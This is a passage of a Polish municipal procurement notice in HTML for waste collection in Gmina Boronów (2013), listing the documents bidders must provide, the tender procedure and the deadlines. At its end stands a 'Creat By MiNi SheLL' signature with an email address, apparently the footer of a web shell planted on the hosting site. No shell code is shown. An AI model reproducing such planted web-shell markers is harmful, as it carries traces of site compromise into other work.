<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>informację o częściach zamówienia, których wykonanie Wykonawca powierzy podwykonawcom - według wzoru stanowiącego  załącznik nr 7 do SIWZ, 
 aktualne pozwolenie Starosty na transport odpadów komunalnych, w tym odpadów niebezpiecznych wyłonionych ze strumienia odpadów komunalnych z grupy 15 i 20,
aktualny wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Boronów , w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska lub zapewnienie gotowości przyjęcia odpadów przez przedsiębiorcę  posiadającego wpis do rejestru, o którym mowa wyżej,
aktualne zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów komunalnych lub zapewnienie gotowości przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.boronow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Boronów, ul. Dolna 2, 42-283 Boronów, pok. nr 12 w cenie 50 zł + VAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2013 godzina 10:00, miejsce: Gmina Boronów, ul. Dolna 2, 42-283 Boronów, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie zamierza zawrzeć umowy ramowej
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com